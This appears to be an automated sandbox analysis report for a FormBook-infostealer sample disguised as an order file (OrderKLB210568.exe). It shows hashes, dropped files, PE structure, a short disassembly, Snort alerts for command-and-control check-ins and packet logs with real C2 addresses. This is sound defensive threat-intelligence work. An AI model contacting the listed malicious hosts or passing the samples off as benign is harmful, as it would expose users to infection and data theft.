                                                                • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                                                                • Excluded IPs from analysis (whitelisted): 13.64.90.137, 168.61.161.212, 52.113.196.254, 13.107.3.254, 92.122.145.220, 204.79.197.200, 13.107.21.200, 20.82.209.183, 20.54.104.15, 2.20.142.209, 2.20.142.210, 20.54.7.98, 20.54.26.129, 92.122.213.194, 92.122.213.247, 20.82.210.154
                                                                • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, s-ring.msedge.net, store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a1449.dscg2.akamai.net, arc.msn.com, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, teams-9999.teams-msedge.net, e12564.dspb.akamaiedge.net, www-bing-com.dual-a-0001.a-msedge.net, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, au-bg-shim.trafficmanager.net, www.bing.com, skypedataprdcolwus17.cloudapp.net, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, dual-a-0001.a-msedge.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, consumerrp-displaycatalog-aks2aks-europe.md.mp.microsoft.com.akadns.net, s-ring.s-9999.s-msedge.net, ris.api.iris.microsoft.com, a-0001.a-afdentry.net.trafficmanager.net, s-9999.s-msedge.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, teams-ring.teams-9999.teams-msedge.net, teams-ring.msedge.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net, neu-consumerrp-displaycatalog-aks2aks-europe.md.mp.microsoft.com.akadns.net
• Not all processes were analyzed; the report is missing behavior information
                                                                • VT rate limit hit for: /opt/package/joesandbox/database/analysis/433298/sample/OrderKLB210568.exe

                                                                Simulations

                                                                Behavior and APIs

                                                                No simulations

                                                                Joe Sandbox View / Context

                                                                IPs


                                                                Domains


                                                                ASN

                                                                my_attach_82862.xlsbGet hashmaliciousBrowse
                                                                • 50.87.220.158
                                                                Fax_Doc#01_5.htmlGet hashmaliciousBrowse
                                                                • 162.241.7.171
                                                                WcCEh3daIE.xlsGet hashmaliciousBrowse
                                                                • 162.241.77.193
                                                                KCTC International Ltd.exeGet hashmaliciousBrowse
                                                                • 192.254.185.244
                                                                lTAPQJikGw.exeGet hashmaliciousBrowse
                                                                • 74.220.199.8
                                                                supply us this product.exeGet hashmaliciousBrowse
                                                                • 50.87.146.199
                                                                #U260e#Ufe0f Zeppelin.com AudioMessage_259-55.HTMGet hashmaliciousBrowse
                                                                • 192.185.74.169
                                                                3arZKnr21W.exeGet hashmaliciousBrowse
                                                                • 192.254.235.195
                                                                6b6zVfqxbk.xlsbGet hashmaliciousBrowse
                                                                • 216.172.184.23
                                                                HM-20210428 HBL.exeGet hashmaliciousBrowse
                                                                • 192.254.180.165
                                                                INQUIRY. ZIP.exeGet hashmaliciousBrowse
                                                                • 50.87.190.227
                                                                audit-78958169.xlsbGet hashmaliciousBrowse
                                                                • 192.185.113.120
                                                                research-1315978726.xlsbGet hashmaliciousBrowse
                                                                • 216.172.184.23
                                                                ExHNIXd73f.exeGet hashmaliciousBrowse
                                                                • 108.167.142.232
                                                                research-2012220787.xlsbGet hashmaliciousBrowse
                                                                • 216.172.184.23
                                                                research-2012220787.xlsbGet hashmaliciousBrowse
                                                                • 216.172.184.23
                                                                viVrtGR9Wg.xlsbGet hashmaliciousBrowse
                                                                • 192.185.113.120
                                                                ON-LINE-DATAServerlocation-NetherlandsDrontenNL1720e03faab70e324d64b586f3ddbdb1a48169dd54d3e.exeGet hashmaliciousBrowse
                                                                • 45.14.14.238
                                                                FreeDiscordNitro.exeGet hashmaliciousBrowse
                                                                • 45.81.227.32
                                                                FreeDiscordNitro.exeGet hashmaliciousBrowse
                                                                • 45.81.227.32
                                                                pXyRNISmvE.exeGet hashmaliciousBrowse
                                                                • 185.203.242.238
                                                                ZCWx5ganpD.exeGet hashmaliciousBrowse
                                                                • 45.81.227.32
                                                                26DLLM5eLv.exeGet hashmaliciousBrowse
                                                                • 45.81.227.32
                                                                1.exe.exeGet hashmaliciousBrowse
                                                                • 185.231.68.230
                                                                0442.pdf.exeGet hashmaliciousBrowse
                                                                • 185.231.68.230
                                                                68avRiNoDd.exeGet hashmaliciousBrowse
                                                                • 185.250.204.130
                                                                ONCK3z5a0Y.exeGet hashmaliciousBrowse
                                                                • 185.250.204.130
                                                                Sbb4QCilrT.exeGet hashmaliciousBrowse
                                                                • 185.250.204.130
                                                                tes.exeGet hashmaliciousBrowse
                                                                • 45.87.0.187
                                                                3333.pdf.exeGet hashmaliciousBrowse
                                                                • 185.231.68.230
                                                                UqosRB5jzG.exeGet hashmaliciousBrowse
                                                                • 45.81.227.32
                                                                oS41hmjrxS.exeGet hashmaliciousBrowse
                                                                • 185.203.242.238
                                                                q3LQr3Aqlk.exeGet hashmaliciousBrowse
                                                                • 176.57.68.60
                                                                Uc18q04nYe.exeGet hashmaliciousBrowse
                                                                • 212.86.114.14
                                                                P748jZ2XlY.exeGet hashmaliciousBrowse
                                                                • 212.86.114.14
                                                                uAC5ja2ZtD.exeGet hashmaliciousBrowse
                                                                • 212.86.114.14
                                                                ehbLUKWH81.exeGet hashmaliciousBrowse
                                                                • 212.86.114.14

JA3 Fingerprints

No context

Dropped Files

Match | Associated Sample Name / URL | Detection
C:\Users\user\AppData\Local\Temp\nsq144C.tmp\System.dll
  DHL Original Receipt_pdf.exe | malicious
  HALKBANK - Dekont_pdf.exe | malicious
  Quote-TSL-1037174_4810.exe | malicious
  SX365783909782021.exe | malicious
  moq fob order.exe | malicious
  0900000000000090000.exe | malicious
  444890321.exe | malicious
  Packing-List_00930039.exe | malicious
  2435.exe | malicious
  INVOICE.exe | malicious
  Shipment Invoice & Consignment Notification.exe | malicious
  KY4cmAI0jU.exe | malicious
  5t2CmTUhKc.exe | malicious
  8qdfmqz1PN.exe | malicious
  New Order PO2193570O1.doc | malicious
  L2.xlsx | malicious
  Agency Appointment VSL Tbn-Port-Appointment Letter- 2100133.xlsx | malicious
  New Order PO2193570O1.pdf.exe | malicious
  2320900000000.exe | malicious
  CshpH9OSkc.exe | malicious

Created / dropped Files

C:\Users\user\AppData\Local\Temp\97ar2a6qp8y
Process: C:\Users\user\Desktop\OrderKLB210568.exe
File Type: data
Category: dropped
Size (bytes): 164352
Entropy (8bit): 7.998966997007402
Encrypted: true
SSDEEP: 3072:5Q1/1OcNUEcQdPAth21syaYbdpWMFLKmUQXDB2c8LanoiETFK/5lb4Bj:2h1tKodIZQ0MwmUQ92tLayS0j
MD5: 3117019DF630EF72A86FB83EFD0E60E3
SHA1: 05E271A8CECC602EDA23BF77783A3A8C49DB9D3A
SHA-256: A79527C569D24B161E9A7E2830B50C16C7F4712D9281539ED650FCEB8341186E
SHA-512: 5B5249F92E10AD0173CD3DE1CBB1B37A0C6CB7E6F27C26BF3E876183F997EAA0AC189E9FF310BFA60ABCE4D0B50691B74F6DC57AD332CD415F6B6E9AEDB7FD67
Malicious: false
Reputation: low
Preview: M.$.e...5.....X.M....../9.n..j.Nxzm.+.c.3d......B..4..1l....9=..>...H.@..K...+T.w*.g_....gVcs...p..g.....!.;h..d=N.!.ca..a}.....5..w...M?.^.z..U>b....`....A.n..%7.~.0..K.l.....iEr.....R.L*.m2..UA.w.x.H.Dp\-.z....gZ.Jx......%s3......b...Y+.2`..}.y7.!'...8.3^,5...5}^....e|P7.cE..w......]f............F.).......DB.Mo.B...<g.S......Qj..<.d.....9E2U..}...<FW...?)..a.o{6.]\bW.......c..~.@.i.x0....?...ttq.$.......s....o..X^...)..:v.,,Gf.#Q..MY...."qq.S.K....J.....(.d.V. .......2.&O.c.'P.n0J.......4....z..E=V.$..~...e..N(.hVs..=.u.t...Nc..!..`..h..L.T.<y.fk............q^..SNe...|.\.h.)[.4...r....q-..p.YX..p.>Q..t,#..z.h}.Z^H.[.@.T.b...].-.4.Hr..1S0..#..g.1.H/..N...../.I.B..Y.............3.."....g.A...R6...'C..B...vI_.d.....T.....)....8!P3./.F...n......@/.(.U..8LD.......2t...."r....!..%h'.V...7.Y.6!m.m.P....*.b2.O..O.........d..Cf.st......G..r#.....]...PL..I ...._j%..n....75.j5...d..../.J......$+..{z......I..{..;9.8....l1...I....V.........Y..i)..

C:\Users\user\AppData\Local\Temp\nsq144B.tmp
Process: C:\Users\user\Desktop\OrderKLB210568.exe
File Type: data
Category: dropped
Size (bytes): 261932
Entropy (8bit): 7.335808834866171
Encrypted: false
SSDEEP: 6144:D5h1tKodIZQ0MwmUQ92tLayS0kq+1ils6ret:Nh1tKatwlhBkB8r2
MD5: 075CA91D3D62161BD11E5BDCF4BC2A79
SHA1: B583029D9E0B34A1EF2BB2114CD0837FE2B5A09D
SHA-256: FDE031AD773323B555B0740A337DFAC0E8DA4F2C22C4132BB46E20921C9FC271
SHA-512: C870D7CDAC7D1392D09D2271976EF931CC982588BC0D19AA53FFCDB54213FE53C5F2697FB1CAC7F0742340BE2E18C791582161AF9D51C79378B5574FA830C59B
Malicious: false
Reputation: low
Preview: .r......,........................V.......q.......r..............................................................2...........................................................................................................................................................................J...................j...........................................................................................................................................f...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\nsq144C.tmp\System.dll
Process: C:\Users\user\Desktop\OrderKLB210568.exe
File Type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 11776
Entropy (8bit): 5.855045165595541
Encrypted: false
SSDEEP: 192:xPtkiQJr7V9r3HcU17S8g1w5xzWxy6j2V7i77blbTc4v:g7VpNo8gmOyRsVc4
MD5: FCCFF8CB7A1067E23FD2E2B63971A8E1
SHA1: 30E2A9E137C1223A78A0F7B0BF96A1C361976D91
SHA-256: 6FCEA34C8666B06368379C6C402B5321202C11B00889401C743FB96C516C679E
SHA-512: F4335E84E6F8D70E462A22F1C93D2998673A7616C868177CAC3E8784A3BE1D7D0BB96F2583FA0ED82F4F2B6B8F5D9B33521C279A42E055D80A94B4F3F1791E0C
Malicious: false
Antivirus:
• Antivirus: Metadefender, Detection: 0%
• Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:
• Filename: DHL Original Receipt_pdf.exe, Detection: malicious
• Filename: HALKBANK - Dekont_pdf.exe, Detection: malicious
• Filename: Quote-TSL-1037174_4810.exe, Detection: malicious
• Filename: SX365783909782021.exe, Detection: malicious
• Filename: moq fob order.exe, Detection: malicious
• Filename: 0900000000000090000.exe, Detection: malicious
• Filename: 444890321.exe, Detection: malicious
• Filename: Packing-List_00930039.exe, Detection: malicious
• Filename: 2435.exe, Detection: malicious
• Filename: INVOICE.exe, Detection: malicious
• Filename: Shipment Invoice & Consignment Notification.exe, Detection: malicious
• Filename: KY4cmAI0jU.exe, Detection: malicious
• Filename: 5t2CmTUhKc.exe, Detection: malicious
• Filename: 8qdfmqz1PN.exe, Detection: malicious
• Filename: New Order PO2193570O1.doc, Detection: malicious
• Filename: L2.xlsx, Detection: malicious
• Filename: Agency Appointment VSL Tbn-Port-Appointment Letter- 2100133.xlsx, Detection: malicious
• Filename: New Order PO2193570O1.pdf.exe, Detection: malicious
• Filename: 2320900000000.exe, Detection: malicious
• Filename: CshpH9OSkc.exe, Detection: malicious
Reputation: moderate, very likely benign file
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......ir*.-.D.-.D.-.D...J.*.D.-.E.>.D.....*.D.y0t.).D.N1n.,.D..3@.,.D.Rich-.D.........PE..L.....$_...........!..... ..........!).......0...............................`............@..........................2.......0..P............................P.......................................................0..X............................text............ .................. ..`.rdata..c....0.......$..............@..@.data...h....@.......(..............@....reloc..|....P.......*..............@..B................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\zubtzccsdnrawj
Process: C:\Users\user\Desktop\OrderKLB210568.exe
File Type: data
Category: dropped
Size (bytes): 56433
Entropy (8bit): 4.976785039058637
Encrypted: false
SSDEEP: 1536:dC7v+wlDSox/dl2VOBVMcGfUVPhbPGNm7W/P7+1CSN:dq+1il2V6rVN1W/PECy
MD5: 4125C684CF787B77A40C21FF21919698
SHA1: 4776615370325C5A12BB055979DB2F25F7CF6430
SHA-256: 5D3D7430B01DBD725E66CE52F20D8AF74193DA6BA66901A27E7F8C6DEEC7FC1F
SHA-512: EA3D6502BE7CB0DF88FA8E537308CC723B3B1C713FA168B354F3F59A921AA1B49F6FD6E5F4ADB8E2A946C1C4611832BE4DDAFAD270A13D6147260BA35F5BBC14
Malicious: false
Reputation: low
Preview: U......3....h...l.i.....j.....k.....l.....m.....n.....o.....p.....q.....r...5.s.....t.....u.....v.....w.....x.....y.....z...2.{.....|.....}.....~...........................x.........................................x.................x.........................................G...........x...................................x...........Q...........x.................x...........y...........x.............................x...........u...................................1.............................x.........................................G...........x...................................x...........Q...........x.................x...........y...........x.............................x...........9.................................................................x.........................................G...........x...................................x......

                                                                                                        Static File Info

                                                                                                        General

                                                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                        Entropy (8bit):7.910495155049787
                                                                                                        TrID:
                                                                                                        • Win32 Executable (generic) a (10002005/4) 92.16%
                                                                                                        • NSIS - Nullsoft Scriptable Install System (846627/2) 7.80%
                                                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                        File name:OrderKLB210568.exe
                                                                                                        File size:221568
                                                                                                        MD5:759b0d51f128f54e516ad1941a896d77
                                                                                                        SHA1:13e8d9d44cf15bcfc43952eebc3f10fcafed23a3
                                                                                                        SHA256:a08bf89a7e4c15fb33684e268199df85727a6ab759a1d7f3d5ba2b7a0e49f17a
                                                                                                        SHA512:216cd9f75609990103b52793e8e34a7e4af69d546523dd13def7314082d9454b1fcbef7c89004d2b6fff0662d25187fe8f3fd043df2798b5acfd86fea744d654
                                                                                                        SSDEEP:6144:Ds9S8uq8rbsONjyPS4cebFLeingaqlN1oENmejm:yyqmb+Zzngrd4
                                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i........................PE..L......K.................\.........

File Icon

Icon Hash: b2a88c96b2ca6a72

Static PE Info

General

Entrypoint: 0x40323c
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics: TERMINAL_SERVER_AWARE
Time Stamp: 0x4B1AE3C6 [Sat Dec 5 22:50:46 2009 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: 099c0646ea7282d232219f8807883be0

Entrypoint Preview

Instruction
sub esp, 00000180h
push ebx
push ebp
push esi
xor ebx, ebx
push edi
mov dword ptr [esp+18h], ebx
mov dword ptr [esp+10h], 00409130h
xor esi, esi
mov byte ptr [esp+14h], 00000020h
call dword ptr [00407030h]
push 00008001h
call dword ptr [004070B4h]
push ebx
call dword ptr [0040727Ch]
push 00000008h
mov dword ptr [00423F58h], eax
call 00007FBE6C3531FEh
mov dword ptr [00423EA4h], eax
push ebx
lea eax, dword ptr [esp+34h]
push 00000160h
push eax
push ebx
push 0041F458h
call dword ptr [00407158h]
push 004091B8h
push 004236A0h
call 00007FBE6C352EB1h
call dword ptr [004070B0h]
mov edi, 00429000h
push eax
push edi
call 00007FBE6C352E9Fh
push ebx
call dword ptr [0040710Ch]
cmp byte ptr [00429000h], 00000022h
mov dword ptr [00423EA0h], eax
mov eax, edi
jne 00007FBE6C3505FCh
mov byte ptr [esp+14h], 00000022h
mov eax, 00429001h
push dword ptr [esp+14h]
push eax
call 00007FBE6C352992h
push eax
call dword ptr [0040721Ch]
mov dword ptr [esp+1Ch], eax
jmp 00007FBE6C350655h
cmp cl, 00000020h
jne 00007FBE6C3505F8h
inc eax
cmp byte ptr [eax], 00000020h
je 00007FBE6C3505ECh
cmp byte ptr [eax], 00000022h
mov byte ptr [eax+eax+00h], 00000000h

Rich Headers

Programming Language:
• [EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x73a4 | 0xb4 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x2c000 | 0x9e0 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x7000 | 0x28c | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

Sections

Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x5a5a | 0x5c00 | False | 0.660453464674 | data | 6.41769823686 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata | 0x7000 | 0x1190 | 0x1200 | False | 0.4453125 | data | 5.18162709925 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x9000 | 0x1af98 | 0x400 | False | 0.55859375 | data | 4.70902740305 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.ndata | 0x24000 | 0x8000 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc | 0x2c000 | 0x9e0 | 0xa00 | False | 0.45625 | data | 4.51012867721 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name | RVA | Size | Type | Language | Country
RT_ICON | 0x2c190 | 0x2e8 | data | English | United States
RT_DIALOG | 0x2c478 | 0x100 | data | English | United States
RT_DIALOG | 0x2c578 | 0x11c | data | English | United States
RT_DIALOG | 0x2c698 | 0x60 | data | English | United States
RT_GROUP_ICON | 0x2c6f8 | 0x14 | data | English | United States
RT_MANIFEST | 0x2c710 | 0x2cc | XML 1.0 document, ASCII text, with very long lines, with no line terminators | English | United States

Imports

DLL | Import
KERNEL32.dll | CompareFileTime, SearchPathA, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, SetFileAttributesA, Sleep, GetTickCount, CreateFileA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, SetFileTime, GetTempPathA, GetCommandLineA, SetErrorMode, LoadLibraryA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, GetTempFileNameA, lstrlenA, lstrcatA, GetSystemDirectoryA, GetVersion, CloseHandle, lstrcmpiA, lstrcmpA, ExpandEnvironmentStringsA, GlobalFree, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GetModuleHandleA, LoadLibraryExA, GetProcAddress, FreeLibrary, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, WriteFile, ReadFile, MulDiv, SetFilePointer, FindClose, FindNextFileA, FindFirstFileA, DeleteFileA, GetWindowsDirectoryA
USER32.dll | EndDialog, ScreenToClient, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, DestroyWindow, CreateDialogParamA, SetTimer, SetWindowTextA, PostQuitMessage, SetForegroundWindow, wsprintfA, SendMessageTimeoutA, FindWindowExA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, OpenClipboard, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongA, LoadImageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, ShowWindow
GDI32.dll | SetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectA, SetBkMode, SetTextColor, SelectObject
SHELL32.dll | SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA, SHGetSpecialFolderLocation
ADVAPI32.dll | RegQueryValueExA, RegSetValueExA, RegEnumKeyA, RegEnumValueA, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA
COMCTL32.dll | ImageList_AddMasked, ImageList_Destroy, ImageList_Create
ole32.dll | CoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
VERSION.dll | GetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA

Possible Origin

Language of compilation system | Country where language is spoken | Map
English | United States |

Network Behavior

Snort IDS Alerts

Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
06/11/21-15:43:22.045766 | ICMP | 402 | ICMP Destination Unreachable Port Unreachable | | | 192.168.2.4 | 8.8.8.8
06/11/21-15:43:23.101997 | ICMP | 402 | ICMP Destination Unreachable Port Unreachable | | | 192.168.2.4 | 8.8.8.8
06/11/21-15:43:25.137748 | ICMP | 402 | ICMP Destination Unreachable Port Unreachable | | | 192.168.2.4 | 8.8.8.8
06/11/21-15:43:42.578503 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49769 | 80 | 192.168.2.4 | 74.208.236.54
06/11/21-15:43:42.578503 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49769 | 80 | 192.168.2.4 | 74.208.236.54
06/11/21-15:43:42.578503 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49769 | 80 | 192.168.2.4 | 74.208.236.54
06/11/21-15:44:17.271176 | ICMP | 402 | ICMP Destination Unreachable Port Unreachable | | | 192.168.2.4 | 8.8.8.8

Network Port Distribution

TCP Packets

                                                                                                        Jun 11, 2021 15:44:04.700810909 CEST4977580192.168.2.4142.250.180.243
                                                                                                        Jun 11, 2021 15:44:04.701019049 CEST4977580192.168.2.4142.250.180.243
                                                                                                        Jun 11, 2021 15:44:04.765010118 CEST8049775142.250.180.243192.168.2.4
                                                                                                        Jun 11, 2021 15:44:04.809139967 CEST8049775142.250.180.243192.168.2.4
                                                                                                        Jun 11, 2021 15:44:04.809257984 CEST8049775142.250.180.243192.168.2.4
                                                                                                        Jun 11, 2021 15:44:04.809343100 CEST4977580192.168.2.4142.250.180.243
                                                                                                        Jun 11, 2021 15:44:04.809423923 CEST4977580192.168.2.4142.250.180.243
                                                                                                        Jun 11, 2021 15:44:04.872476101 CEST8049775142.250.180.243192.168.2.4
                                                                                                        Jun 11, 2021 15:44:09.905366898 CEST4977680192.168.2.445.87.1.159
                                                                                                        Jun 11, 2021 15:44:09.959625006 CEST804977645.87.1.159192.168.2.4
                                                                                                        Jun 11, 2021 15:44:09.959851980 CEST4977680192.168.2.445.87.1.159
                                                                                                        Jun 11, 2021 15:44:09.959887981 CEST4977680192.168.2.445.87.1.159
                                                                                                        Jun 11, 2021 15:44:10.011744976 CEST804977645.87.1.159192.168.2.4
                                                                                                        Jun 11, 2021 15:44:10.011770010 CEST804977645.87.1.159192.168.2.4
                                                                                                        Jun 11, 2021 15:44:10.011779070 CEST804977645.87.1.159192.168.2.4
                                                                                                        Jun 11, 2021 15:44:10.011972904 CEST4977680192.168.2.445.87.1.159
                                                                                                        Jun 11, 2021 15:44:10.012043953 CEST4977680192.168.2.445.87.1.159
                                                                                                        Jun 11, 2021 15:44:10.063390970 CEST804977645.87.1.159192.168.2.4

UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jun 11, 2021 15:42:01.233787060 CEST | 53 | 54531 | 8.8.8.8 | 192.168.2.4
Jun 11, 2021 15:42:02.464631081 CEST | 49714 | 53 | 192.168.2.4 | 8.8.8.8
Jun 11, 2021 15:42:02.514976978 CEST | 53 | 49714 | 8.8.8.8 | 192.168.2.4
Jun 11, 2021 15:42:02.547041893 CEST | 58028 | 53 | 192.168.2.4 | 8.8.8.8
Jun 11, 2021 15:42:02.606267929 CEST | 53 | 58028 | 8.8.8.8 | 192.168.2.4
Jun 11, 2021 15:42:02.864402056 CEST | 53097 | 53 | 192.168.2.4 | 8.8.8.8
Jun 11, 2021 15:42:02.915596962 CEST | 53 | 53097 | 8.8.8.8 | 192.168.2.4
Jun 11, 2021 15:42:04.287547112 CEST | 49257 | 53 | 192.168.2.4 | 8.8.8.8
Jun 11, 2021 15:42:04.340919018 CEST | 53 | 49257 | 8.8.8.8 | 192.168.2.4
Jun 11, 2021 15:42:04.506211996 CEST | 62389 | 53 | 192.168.2.4 | 8.8.8.8
Jun 11, 2021 15:42:04.567045927 CEST | 53 | 62389 | 8.8.8.8 | 192.168.2.4
Jun 11, 2021 15:42:05.913096905 CEST | 49910 | 53 | 192.168.2.4 | 8.8.8.8
Jun 11, 2021 15:42:05.967725992 CEST | 53 | 49910 | 8.8.8.8 | 192.168.2.4
Jun 11, 2021 15:42:07.133013964 CEST | 55854 | 53 | 192.168.2.4 | 8.8.8.8
Jun 11, 2021 15:42:07.185890913 CEST | 53 | 55854 | 8.8.8.8 | 192.168.2.4
Jun 11, 2021 15:42:08.238662004 CEST | 64549 | 53 | 192.168.2.4 | 8.8.8.8
Jun 11, 2021 15:42:08.289069891 CEST | 53 | 64549 | 8.8.8.8 | 192.168.2.4
Jun 11, 2021 15:42:09.172849894 CEST | 63153 | 53 | 192.168.2.4 | 8.8.8.8
Jun 11, 2021 15:42:09.223556995 CEST | 53 | 63153 | 8.8.8.8 | 192.168.2.4
Jun 11, 2021 15:42:10.113800049 CEST | 52991 | 53 | 192.168.2.4 | 8.8.8.8
Jun 11, 2021 15:42:10.163866043 CEST | 53 | 52991 | 8.8.8.8 | 192.168.2.4
Jun 11, 2021 15:42:11.088670969 CEST | 53700 | 53 | 192.168.2.4 | 8.8.8.8
Jun 11, 2021 15:42:11.141144991 CEST | 53 | 53700 | 8.8.8.8 | 192.168.2.4
Jun 11, 2021 15:42:12.074021101 CEST | 51726 | 53 | 192.168.2.4 | 8.8.8.8
Jun 11, 2021 15:42:12.123920918 CEST | 53 | 51726 | 8.8.8.8 | 192.168.2.4
Jun 11, 2021 15:42:13.007347107 CEST | 56794 | 53 | 192.168.2.4 | 8.8.8.8
Jun 11, 2021 15:42:13.069133997 CEST | 53 | 56794 | 8.8.8.8 | 192.168.2.4
Jun 11, 2021 15:42:14.407571077 CEST | 56534 | 53 | 192.168.2.4 | 8.8.8.8
Jun 11, 2021 15:42:14.458976984 CEST | 53 | 56534 | 8.8.8.8 | 192.168.2.4
Jun 11, 2021 15:42:15.352391005 CEST | 56627 | 53 | 192.168.2.4 | 8.8.8.8
Jun 11, 2021 15:42:15.402287960 CEST | 53 | 56627 | 8.8.8.8 | 192.168.2.4
Jun 11, 2021 15:42:16.481600046 CEST | 56621 | 53 | 192.168.2.4 | 8.8.8.8
Jun 11, 2021 15:42:16.533114910 CEST | 53 | 56621 | 8.8.8.8 | 192.168.2.4
Jun 11, 2021 15:42:19.058721066 CEST | 63116 | 53 | 192.168.2.4 | 8.8.8.8
Jun 11, 2021 15:42:19.108803988 CEST | 53 | 63116 | 8.8.8.8 | 192.168.2.4
Jun 11, 2021 15:42:19.990513086 CEST | 64078 | 53 | 192.168.2.4 | 8.8.8.8
Jun 11, 2021 15:42:20.040512085 CEST | 53 | 64078 | 8.8.8.8 | 192.168.2.4
Jun 11, 2021 15:42:21.823307037 CEST | 64801 | 53 | 192.168.2.4 | 8.8.8.8
Jun 11, 2021 15:42:21.875020981 CEST | 53 | 64801 | 8.8.8.8 | 192.168.2.4
Jun 11, 2021 15:42:23.316617012 CEST | 61721 | 53 | 192.168.2.4 | 8.8.8.8
